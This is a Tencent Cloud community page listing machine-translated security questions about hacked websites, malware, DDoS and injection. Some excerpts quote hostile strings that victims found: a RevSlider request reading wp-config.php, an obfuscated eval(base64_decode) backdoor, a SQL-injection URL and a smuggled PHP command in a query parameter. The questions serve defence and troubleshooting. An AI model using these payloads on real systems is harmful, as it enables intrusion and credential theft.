腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
视频
沙龙
4
回答
为什么妥协的网站经常带你通过多个URL重定向?
引用自我的课程讲师的演讲: 以下是典型网络攻击的阶段:受害者访问已被破坏的合法网站。受影响的网站将受害者重定向到正在运行由攻击者控制的恶意代码的另一个网站。重定向可以首先通过各种中间服务器。 我也面临着同样的问题。如果我访问洪流网站,并错误地或有意地点击一些链接,它带我到另一个网站通过各种中介网站。为什么它会在几秒钟内通过许多站点而不是直接进入最后一个站点?对攻击者有什么好处?
浏览 0
提问于2018-02-09
得票数 27
回答已采纳
1
回答
在点击事件上显示广告
、
这是我的网站。我没有得到任何广告弹出当直接进入我的网站到地址栏。但当在谷歌上搜索我的网站并点击我的网站结果中的链接时,我会在点击网站时弹出未知广告。但我没有在网站上添加任何广告。请帮帮忙?
浏览 11
提问于2018-02-23
得票数 0
1
回答
BeEF -妥协的指标是什么(国际奥委会)
、
如果一封网络钓鱼电子邮件与BeEF (或其他类似的框架)网站的链接通过,那么这种攻击的妥协指标是什么? 此外,如果系统被破坏了,那么缓解它的最佳策略将是什么。
浏览 0
提问于2017-03-23
得票数 2
回答已采纳
1
回答
网站安全:用无声的java驱动器感染人们意味着什么?
、
、
、
、
有人通过我的网站提交了一个匿名联系请求,声称他们发现了一个漏洞,并询问了一个bug赏金程序。 他们分享说,他们找到了一种用无声的java驱动器感染人们的方法。 那是什么弱点? 避免这种情况的基本方法是什么?
浏览 3
提问于2013-09-30
得票数 2
回答已采纳
2
回答
PKI签名验证是否需要公钥的安全分发?
、
我正在查看一个软件项目,其中维护人员的GPG公钥可以在使用HTTP的网站上找到。根据GNU隐私手册,“使用相应的公钥验证签名。”所以,我想知道的是,攻击者能否加密恶意有效载荷,在项目网站上使用MITM攻击并提供自己的公钥? 用于验证的公钥不是也必须安全地传输吗?
浏览 0
提问于2016-03-19
得票数 0
回答已采纳
2
回答
google chrome将您的站点视为恶意软件
、
、
、
我刚刚发现我的一个网站被Chrome认为是恶意软件。 以下是谷歌Chrome展示的内容: ___网站包含来自网站___的元素,该网站似乎承载恶意软件--可能会伤害您的计算机或未经您的同意而操作的软件。只要访问一个包含恶意软件的站点,就会感染您的计算机。 我的网站使用Joomla 1.5作为CMS,并发行证券,其中一个模板("beez“,我认为是模板的名称)与Joomla包含了一种病毒,现在我更新了Joomla并删除了模板,并且我认为解决了这个问题。 现在Chrome仍然认为我的网站是恶意软件。我有什么办法解决这个问题吗? 谢谢!
浏览 7
提问于2009-10-10
得票数 0
回答已采纳
3
回答
检测试图安装程序的网站
我是PHP新手,正在尝试了解是否有方法可以在未经您授权的情况下捕获在您的计算机上安装程序的网站。例如,当你访问一些网站时,你的计算机可能仅仅通过访问该网页就会感染病毒。仅仅通过查看它的html代码,有没有一种方法可以让我知道一个网页是不是在我的电脑上安装了什么东西?任何帮助都将不胜感激。
浏览 0
提问于2013-06-08
得票数 0
回答已采纳
1
回答
侦测到高风险入侵
、
、
、
我有来自赛门铁克的端点保护。最近,我收到了许多赛门铁克云警报电子邮件。 wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php 他们一直在攻击托管在我服务器上的随机域。我的大多数网站都使用基于.NET的框架,只有少数网站运行在Wordpress上。而且所有的Wordpress都不使用这个revslider_show_image插件。 我不知道这次攻击的定义(也许是DoS?),但是想知道如何解决这个问题。 目前,我只是使用这种方法阻止IP地址,但我不确定它会有帮助。 --这是赛门铁克的回复,其实没什
浏览 0
提问于2014-09-16
得票数 0
回答已采纳
1
回答
我的计算机能否运行恶意Javascript,因为中间人攻击与HTTP站点的连接?
、
、
为了说明起见,有一个例子: 假设有关于凯尔特神话的教育网站。这是纯粹的只读网站,甚至不允许评论。它也非常简单,它没有像Javascript/Flash/Java/Silverlight/Unity/ActiveX.这样的可执行部分没有广告,因为该网站靠捐赠为生。简而言之,这只是一组完全无害的HTML文档。 但是这个站点使用HTTP而不是HTTPS。这是否意味着理论上一些恶意代理(如黑客、来自其他机器的恶意软件或ISP)可以变成“中间人”,并将恶意Javascript (例如)注入到传输的页面中,尽管原始页面根本没有Javascript?
浏览 0
提问于2018-06-30
得票数 1
回答已采纳
1
回答
每次交易后删除信用卡信息
、
有很多关于黑客在网上购物网站的数据库中泄露信用卡信息的报道。在每次交易后,从我的帐户中删除我的信用卡信息会有效地防止这种盗窃吗?
浏览 0
提问于2015-04-26
得票数 3
2
回答
检测恶意软件是否篡改网站
、
、
是否有方法检测最终用户系统上的恶意软件是否正在修改HTML?我有一个HTTPS保护的网站,最近遇到了一个支持电话,用户在我的网站上看到广告。我在我的网站上没有广告,我们在最终用户的系统上运行了反病毒扫描,发现并清除了许多感染,之后广告消失了。不幸的是,我无法提供任何代码示例,因为我甚至不知道从哪里开始。
浏览 2
提问于2014-11-10
得票数 0
回答已采纳
3
回答
恶意软件问题
网站主机驱动程序恶意软件配置的域名非常类似于一个主要的社交网站。这种攻击的名称是什么?
浏览 0
提问于2018-07-22
得票数 -1
3
回答
如果您禁用了JavaScript,可以访问网站病毒吗?
、
假设我访问了一个网站,只要访问它,它就可能感染我的电脑。如果我禁用JavaScript,是否仍有可能感染我的计算机? 我已经搜索过这个问题了,但我只发现这样的问题,没有提到禁用JavaScript。
浏览 0
提问于2021-04-08
得票数 2
回答已采纳
2
回答
如何在web服务器上查找易受攻击的站点
、
、
、
我的一个客户有一个管理的VPS,上面有几十个网站,甚至有几百个。现在他的服务器经常被感染。网络主机/服务器管理员一直在黑暗中挖掘。他们每月运行一次扫描,删除受感染的软件,但不能说它来自哪个站点,因为日志文件似乎是干净的。 他使用cuteFtp Pro进行密码加密,所以这可能与FTP无关。 它是一个LAMP系统,具有最新的Apache和PHP / MySQL安装。 现在是否有任何方法或工具来扫描整个服务器的漏洞,而无需手动检查每个网站?这是可能有一些旧的WordPressinstallations在那里,但它需要很长时间来检查每个网站单独。 其中一个感染是这样的: </html> &
浏览 0
提问于2013-09-06
得票数 1
1
回答
Prowli恶意软件行动感染40 000多台机器
、
、
、
、
看来一种新的恶意软件感染被称为“Prowli恶意软件行动”,大约4万台机器被感染。 仍然没有在CVE网站上更新有关漏洞的CVE数据。 有人知道这个恶意软件的影响和缓解机制吗?
浏览 0
提问于2018-06-10
得票数 1
回答已采纳
2
回答
为什么Websense在与http一起使用时阻塞相同的站点&而不是当使用https时?
、
、
、
、
我一直在一家IT公司工作。我可以访问一些社交网站。当我试图打开邮件中的站点链接(这是有http://),的)时,websense提示我访问被阻塞了。但是,当我尝试使用https打开同一个站点时,它打开时没有阻塞吗?
浏览 0
提问于2014-09-19
得票数 0
1
回答
在静态网站上拦截黑客机器人有好处吗?
、
、
每天,机器人都试图通过请求具有已知漏洞的文件(例如,"/FCKeditor/_whatsnew")来寻找进入我的网站的方法。我没有任何这样的文件,因为我的网站是静态的,我不使用任何插件或现成的软件。我对试图利用我的站点的其他人感到厌烦,所以我想我可以写一个脚本来扫描日志文件,然后在.htaccess中禁止任何请求这些幻影文件的IP。(我不能添加到apache2.conf / http.conf文件中,因为我的add主机覆盖了对该文件所做的任何更改。)然而,我不知道禁止违法者是否真的比让他们得到404更好。增加大量禁用的it意味着服务器必须解析合法用户的每一个请求的列表,而不禁止
浏览 3
提问于2022-09-27
得票数 0
2
回答
恶意软件会导致firefox发送GET请求吗?
、
、
网站是否有可能承载恶意软件,如果访问某个页面,Firefox就会发送额外的GET请求吗?我看到了来自我的攻击的流量,而我还没有这么做。 --澄清 "I“正在发送SQL注入字符串,而实际上我没有;ajax可以这样做吗?
浏览 0
提问于2014-04-14
得票数 0
回答已采纳
2
回答
用电话进行乐队外的验证;谬论?
、
现在越来越多的网站要求新用户验证他们的“身份”,要求用户证明他/她可以使用电话号码(通常是电话号码)识别的设备。 经常被引用的原因是“保护你的帐户”这一相当非特定的原因。 我同意,如果用户只使用台式机/膝上型电脑与服务交互,使用手机作为“你拥有的东西”的带外验证可以有效地被视为双因素认证。 然而..。所有在线接入的超过50%现在都是使用移动设备完成的,比如智能手机。 使用移动设备来证明用户可以访问所述设备,是否会破坏隐含的附加安全性?
浏览 0
提问于2016-04-09
得票数 4
3
回答
在线域还是链接过滤器?
、
、
我计划做一个像tinyurl这样的网站。问题是,我不想让域名隐藏在我身后,如果他们做得不好。一个示例站点是http://www.noob.com/。Firefox+google将其报告为攻击站点。如果我能得到一个自动更新黑名单为这些领域(或链接,但我更喜欢域),那么很好。封锁成人网站也是好的。 怎样才能防止滥用我的服务?
浏览 0
提问于2009-08-26
得票数 0
2
回答
登录到不属于我的虚拟私有服务器安全吗?
、
、
使用我不拥有的虚拟私有服务器(VPS)有什么危险? 邮件列表上的某个人提议让我在他的Linux VPS上免费托管我的网站,并允许我通过ssh键访问非根ssh。 最坏的情况是什么?我能采取什么措施来避免这种情况呢? 到目前为止,我只使用ssh进入Heroku应用程序,然后使用ssh键从Heroku进入VPS。我只在VPS上使用Lynx浏览器查看VPS上的文件。 谢谢。
浏览 0
提问于2017-07-30
得票数 3
回答已采纳
3
回答
当我使用参数化查询时,我需要保护我的ASP站点免受SQL注入吗?
、
、
我收到了修改ASP网站的要求,该网站有很多功能来防止SQL注入。 本网站不允许我们的客户在本网站上注册。 在客户端的名称上有"SELECT“一词。防止SQL注入的功能正在取代"“的"SELECT”字。客户肯定不会喜欢收到一封没有自己名字的信。LOL 该网站正在使用传统的ASP方式访问数据,类似于: strSQL = "SELECT name " & _ "FROM MyTable " & _ "WHERE (ID=" & itemID & ") AND
浏览 0
提问于2012-06-19
得票数 1
回答已采纳
1
回答
保护Wordpress免受ddos攻击
、
、
、
📷 以上截图是从我的网站的cpanel访问者list.My网站是建立在wordpress上。我认为有人正试图用DDOS攻击破解我的网站,并在单个night.Although中耗尽我的10 my带宽,我应用了https,并将访问不存在的URL的重复ip地址列入了黑名单。避免这种攻击的其他可能的方法是什么?
浏览 0
提问于2019-11-06
得票数 1
1
回答
不同主机服务器上的脚本注入= FTP黑客?
在过去的几个星期里,我在我的几个网站上都遇到了同样的注入脚本。今天,我意识到这些网站并不共享相同的主机服务器,但攻击(1)在同一时间(2)是相同的。 这是否证明我的FTP密码被窃取了(它们都存储在我硬盘上的Filezilla XML文件中)?安全漏洞还能是什么?
浏览 0
提问于2013-03-18
得票数 3
回答已采纳
2
回答
使用node.js的网站,托管架构决策
、
、
、
、
我计划开始我的第一个网站。该网站是一个小型HTML5+CSS+JS网站,后端运行node.js,为存储在mongodb上的数据提供服务。我想知道在大多数情况下,哪一种是最好的解决方案: 网络托管(SSL和cloudflare) + VPS服务于端口3000 (使用SSL、cloudflare和node.js提供合理数据;用户和pass以及本地mongodb) 所有东西都在同一个VPS里。 你能给出的任何其他方法。 问题是,在第一种方法中,体系结构中有两个元素,所以如果有人想要破解它,我想这会更加困难。另一方面,在第二种方法中,如果VPS被黑了,所有的东西都被黑了,并且他们可
浏览 3
提问于2014-10-22
得票数 0
回答已采纳
2
回答
从表单输入在我的网站上运行PHP命令
、
我今天在我的网站上发现了一些文件被创建、删除和编辑。我不知道是怎么做到的。但我知道这可以通过一些PHP函数来完成,比如: mkdir('Folder'); file_put_contents();scandir();... 但是,这些代码只有在我用PHP代码编写时才会执行。 如何从$_GET值运行这些命令 示例PHP,它显示来自URL的?name查询。 可以在里面注入代码并黑进我的网站吗? 就像https://example.com?name=".mkdir("Hacked")." 如果是的话,那我怎么才能防止这些错误和黑客呢?
浏览 0
提问于2022-08-03
得票数 0
2
回答
有恶意软件的网站用户该怎么办?
我有一个使用jquery的网站,该网站由https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js的google cdn托管。 我的一个用户抱怨网站不适合他们。我让他们查看开发人员控制台,他们在使用jquery.min.js时出现了一些错误,所以我让他们在一个新的选项卡中打开链接并将文件发送给我。文件的底部是一些脚本,试图将数据发布到adloads.net,但是jquery.min.js中的//# sourceMappingURL会导致javascript错误。 我猜想他们有一些恶意软件浏览器插件,或者可能是一种病毒将额外的
浏览 0
提问于2017-01-01
得票数 3
2
回答
对未加固Web服务器的攻击统计
、
假设我的web服务器在公共互联网上。 它不在防火墙硬件后面。 它确实使用了HTTPS,并且打开了操作系统防火墙软件--但这是唯一的安全机制。 是否有公布的统计数据表明这样的web服务器遭到黑客攻击? 请随意做任何关于OS,web服务器,框架,语言,网站类型等的假设-我对一般的统计和信息感兴趣。(类似于未修补的Windows XP在上线后的7秒内受到攻击).)
浏览 0
提问于2013-03-13
得票数 1
1
回答
我可以导出所有的Wordpress页面,首选项等吗?
、
我有一个与Wordpress建立的网站,它自那以后被黑客攻击,并将客户转发到一个不同的网站,显示不适当的东西。我没有任何备份的网站,所以我不能只是恢复备份,并使其恢复正常。 所以我的问题是,如果我删除网站及其所有内容,我是否必须重做我的所有页面和网站上的所有内容,或者是否有一种方法可以导出网站的所有信息,以便我可以导入所有设置并避免重做整个网站?包括主题吗?
浏览 24
提问于2016-07-31
得票数 0
3
回答
站点后门& eval()
、
、
我在运行一个Joomla 1.7网站,它今天被黑了。下面的脚本完成了黑客攻击。 eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJ
浏览 4
提问于2013-02-20
得票数 3
回答已采纳
1
回答
系统备份以防攻击?
、
、
我的系统将在英国一家著名的保险公司运行,它将保存和处理大量的索赔、刹车等信息。 我担心该公司和该网站,因为该网站需要通过外部经纪人访问,将成为DDoS的目标。 如果服务器上发生DDoS攻击,代码中有什么可以备份所有数据的吗? 我有一种感觉,我会得到‘不’或‘是’的答案,如果是这样的话,我可以设置哪些额外的安全措施来尝试和防止DDoS攻击?
浏览 0
提问于2015-04-16
得票数 0
回答已采纳
1
回答
HTML5网络存储(sessionStorage和localStorage)有多安全?
、
、
、
、
我正在考虑使用sessionStorage或localStorage来存储一些重要的用户数据。 扩展的功能将只在默认为HTTPS的特定网站的上下文中工作。 这些数据不是机密的,但我想确保它不能被恶意攻击者修改或删除,因为它对于扩展的操作是基本的。 我需要采取什么预防措施?
浏览 0
提问于2016-06-30
得票数 3
回答已采纳
2
回答
哪个是来自IoT设备的最危险和最受欢迎的僵尸网络?
、
易于控制廉价的IoT设备,使他们成为制造僵尸网络来执行DDoS攻击的完美目标。 我听说僵尸网络是从许多被黑客入侵的IoT设备上创建的,这些设备用来在网站上创建DDoS攻击。 这些信息中有多少是真的?现在IoT僵尸网络是否存在着共同的威胁?哪个是最流行的IoT僵尸网络和攻击?
浏览 0
提问于2018-04-23
得票数 -1
回答已采纳
3
回答
DuckDuckGo访问网上银行网站安全吗?
、
我用DuckDuckGo搜索引擎来保护我的隐私。使用DuckDuckGo访问网上银行网站是安全的选择吗?
浏览 0
提问于2019-01-31
得票数 -1
1
回答
我们的一个用户访问了我网站中的不同URL
、
、
我有一个附属网站。我正在监控用户正在访问的网站。我第一次注意到一个用户正在访问我网站中的url,我猜这是某种黑客的企图。我需要帮助。我的网站经常表现不佳。有时它打开的时间比正常时间长。有时表格显示为空。有时Cron作业无法执行。 以下是用户重复访问的几个URL: http://www.example.com/product.php?category=study-materials&id=SHOEMHMZH8HPAX4H%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,10
浏览 1
提问于2018-04-02
得票数 1
1
回答
修改后的wp-config.php?
、
这可能是一个广泛的话题,但我正在搜索和阅读,但无法消除我的疑虑,请提供答复或链接,从哪里我可以了解代码如何注入到WP的攻击者。 当点击谷歌搜索的网站名称时,它就会使用垃圾邮件链接。在做了一些扫描后,我发现我们使用的插件https://wordpress.org/plugins/pc-google-analytics/已经过时了。在wp-config.php中有一些代码,如下所示: 📷 这是不是意味着网站被黑了? 我执行了所有必要的更新或核心和插件等,并已通过确认我已经完全删除了一个WordPress黑客? 就是那种代码意味着网站被黑了。我们正在共享托管Bluehost。 我不确定该代码是否是主
浏览 0
提问于2018-01-02
得票数 1
回答已采纳
3
回答
Wordpress网站似乎没有恶意软件,但点击谷歌搜索结果会重定向到垃圾网站
、
、
、
、
给我带来了一个问题,涉及可湿性粉剂环境中的恶意软件。当我在Google中搜索该品牌并点击相应的链接时,我被重定向到一个第三方垃圾网站。 这种情况已经发生了一段时间(超过一周),但我的网站还没有被列入谷歌的黑名单。此外,Norton Safeweb等网站扫描程序都声称网站没有被攻破。 其他详细信息: 我找到并删除了一些可疑的PHP eval()函数,然后在我的页面和数据库中搜索并替换了所有剩余的代码。在该网站被谷歌清理为非黑名单状态后,我认为一切都结束了,我运行了更新,并采取了许多措施来保护该网站免受未来的感染。 然而,这个问题仍然存在。
浏览 1
提问于2012-03-16
得票数 2
回答已采纳
1
回答
我应该使用不同的浏览器浏览和登录帐户吗?
、
、
、
、
我以不同的方式使用网络,即: ( a)登录我的帐户(电子邮件、谷歌、社交网站、论坛等); ( b)下载软件; ( c)浏览受信任的网站; ( d)浏览我不知道是否安全的网站; 我做b),c)和d)与Chrome,并增加了插件,以阻止脚本,广告和跟踪器。因为兼容性问题我不能再使用Sandoxie了。 由于Chrome没有沙箱,而且我的安全只依赖于附加组件,我应该仍然使用不同的浏览器登录我的帐户,还是没关系? 换句话说:如果病毒通过不受信任的网站攻击我,如果它们不保存在同一个浏览器中,我的凭证会受到更多的保护吗?
浏览 0
提问于2017-07-12
得票数 1
回答已采纳
2
回答
说封堵就封堵,真郁闷啊?
、
、
、
这两天网站都会正常,今天突然收到短信说遭受ddos攻击,IP已经被封堵。郁闷啊 然后就给我封堵了1天,这是不是意味着只要一受到攻击我就得被封堵?同行搞我岂不是太容易了 话说开网站以来还是头一次这样啊,也没得罪啥人啊,郁闷
浏览 370
提问于2016-03-28
5
回答
我们html网站中的神秘url
、
、
、
我们的静态html网站的主页正在传输来自一个神秘网站rawalrohi.com的数据。您可以通过转到iffort.com并注意到那里的页脚来检查这一点。它说从rawalrohi.com传输数据。 在我们这边,我们做了以下事情来纠正这个问题 a.)分析所有页面的源代码。我们检查了代码,发现在所有页面中都插入了script src=。我们从网站的所有‘html’页面中删除了这个脚本 B.)接下来我们和托管公司谈过了,他们说他们可以为我们提供网站的备份。我们有备份,但还没有使用它来恢复站点。 C.)最后,我们更改了FTP密码,因为我们被告知有人可能窃取了我们的FTP密码。 尽管这样做了,主页仍然显示
浏览 2
提问于2009-10-21
得票数 1
2
回答
我的密码在不受保护的无线SSL/TLS连接上是否可见?
、
、
如果我使用的是一个没有安全协议的不安全无线网络,并且试图连接到我加密的网上银行网站,那么在这种情况下,正在监听无线网络的攻击者会看到我的密码吗? 如果我与网站的连接是使用SSL/TLS加密的,那么攻击者如何才能看到它?
浏览 0
提问于2015-10-12
得票数 1
回答已采纳
2
回答
一个人是否可以故意创建一个易受攻击的网站来攻击主机提供商的服务器?
、
、
、
是否有可能利用一个应用程序中的漏洞攻击同一服务器上的另一个应用程序? 因此,根据上述问题的答案,当服务器上的一个网站易受远程执行的影响时,这意味着所有驻留在同一服务器上的网站都可能受到破坏。 因此,我想知道是否有人会故意创建一个带有此漏洞的网站。然后让托管提供商托管它。这样的主机提供商可能在一台服务器上有大约50个网站。 这会导致这个服务器上所有其他网站的妥协吗?如果没有,如何防止这种情况发生?如果是的话,怎样才能防止这种情况发生? 关于这个问题的讨论引出了一个关于预防这一问题的新问题:主机提供商如何防止一个网站的妥协导致另一个网站的妥协?
浏览 0
提问于2018-05-30
得票数 7
回答已采纳
1
回答
允许在您的系统上存储持久cookie的风险是什么?
通常,持久化cookie的风险是从站点的角度来描述的,而不是从用户的角度来描述的:如果您实现了持久性cookie,那么在未经适当授权的情况下偷取cookie并使用它访问站点的概率更高。 在过去,错误的信息导致人们认为cookie我携带恶意软件或类似的东西,我们今天知道是不可行的,因为cookie是以纯文本文件形式存储的。 我想象的主要威胁是,如果您存储持久的cookie,如果有人访问您的电脑,他/她可能会窃取饼干,并冒充您在网站上。 ,您是否从用户的角度来可视化其他风险?
浏览 0
提问于2015-12-03
得票数 2
2
回答
一个设备被黑客入侵有多容易?
从我小时候到今天,我仍然有这样的想法:黑客知道你的ip地址,然后他神奇地控制你的设备,并获取你的数据副本。甚至没有发送一个文件或软件安装,然后我在cve网站上看到在android上存在一些漏洞,比如当一个文件被加载,任意代码可以在你的设备上执行,当一个精心制作的文件被加载时这个词看起来很可怕,对我来说,这意味着访问一个网站会导致将这个精心构建的文件作为图像或其他文件加载,我想知道的是,黑客真的这么容易吗?当一个文件加载时,它会在你的设备上执行代码吗?
浏览 0
提问于2019-04-18
得票数 1
回答已采纳
2
回答
个人网站在ovh.com上遭到黑客攻击,代码添加到html中
、
、
、
我的朋友几天前在ovh.com.Since上有一个网站,该网站被谷歌标记为危险网站。 我看了一下这些文件(该站点只包含html、css、pjg),似乎有一行新代码: <script>http://...page.php</script></body> (我不记得确切的url)已经被添加到一些html页面中。这显然是一个病毒,它会在页面显示时运行。 如果我删除这一行,并再次扫描文件,这是很好的。 如何将其添加到服务器上的文件中?有没有办法防止这样的事情发生?(想想.htaccess之类的东西)。我不明白ftp标识符是如何被窃取的,所以对我来说,这个代码插入必须
浏览 0
提问于2010-07-14
得票数 3
回答已采纳
1
回答
“恶意软件检测到我的网站”,一条消息从必应网站管理员工具的网址被删除的网页,我的博客网站。怎么办?
、
、
、
今天,我在Bing网站管理员工具的仪表板上收到一条消息,通知我“在我的网站上检测到了恶意软件”,以获取一个月前我删除的页面的URL。尽管我没有用内容删除工具通知Bing。那我现在该怎么办?请帮帮忙。 以及信息的细节。类型:恶意软件参考在页面上找到。详细信息:恶意软件网络参考。
浏览 0
提问于2020-03-04
得票数 1
2
回答
公共上传文件夹会是一个安全问题吗?
、
、
在我的网站上,我可以让用户将文件上传到服务器上,并能够在一个名为"public uploads“的目录中查看所有上传的文件,在这个目录中,用户可以查看其他用户上传的所有文件。这是Apache目录页面,上面写着"Index of /uploads“。它是一种文件共享中心,人们可以在这里下载和共享其他人的文件。 这会有任何安全问题吗?比如说,用户可以上传恶意的PHP脚本,然后从客户端执行它吗? 我如何解决这些问题,它们应该存在吗?
浏览 3
提问于2015-04-04
得票数 0
1
回答
网站怎么会随机慢?开放的睡眠过程?
、
、
我的网站是随机缓慢的高MYSQL CPU,我不知道是什么问题。希望我能更接近这个帖子的解决方案。 如果我检查mysql进程,当网站运行缓慢时,我会看到很多打开的睡眠命令。当没有打开的睡眠命令时,就没有问题了。所以问题就在这里。 📷 奇怪的是,这个问题有时才会发生。有时候我已经4周没有问题了,现在网站已经连续3天慢了。 我已经将time_out mysql设置设置为30秒,但这无助于解决问题。所以现在我试着找出问题出在哪里。以下是警报状态变量。也许这给了我们一些额外的见解。 📷 会是垃圾邮件/暴力攻击吗? 重/慢查询在网站上吗?服务器设置不好?Sql注射? 这个问题还会引起其他事情吗?现在解决
浏览 0
提问于2017-05-01
得票数 1
回答已采纳
1
回答
Akamai阻止我的Comcast IP地址-如何修复?
、
、
我的IP地址已经被AKAMAI屏蔽了。因此,我无法连接到多个使用AKAMAI的网站,例如united.com。我的ISP是Comcast,我的盒子是调制解调器+路由器一体机。我一直无法更改我的公共IP地址(我试图更改我计算机的MAC地址并关闭该框,但它不起作用)。有没有办法让我更改我的IP,或者我在这些网站上永远被屏蔽了?
浏览 25
提问于2020-01-04
得票数 0
1
回答
Wifi:在事实之后又增加了安全证书?
、
我是大学一年级的学生,最近搬到了住处。很快,我登录了校园wifi,这样我就可以真正地做一些课程和事情了。 我的笔记本电脑和主手机登录时,抱怨很少,但我的第二/旧电话有问题。我去了一个解释如何登录wifi的站点,但是有一步告诉我要选择“使用系统证书”作为我的CA证书。没有这样的选择。最后,我不得不访问另一个大学网站,下载他们提供的证书,但它仍然拒绝连接。我从来没见过“域”文本框像它希望的那样打开。 今天,我重新讨论了这个问题。我检查了其他操作系统的wifi连接说明,其中一个(Chromebook)说它是“不检查/不安装”。我试了一下,告诉它不要使用证书,然后,瞧,它就连在一起了。我查看了网络设置
浏览 0
提问于2021-09-17
得票数 2
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
常见的网站攻击以及如何防御自己的网站被恶意攻击
如何攻击网站,如何让违规网站打不开
CC攻击是什么?如何防止网站被CC攻击?
黑客如何攻击网站?黑客域名劫持攻击详细步骤!
如何防止网站被黑客攻击?
热门
标签
更多标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
活动推荐
运营活动
广告
关闭
领券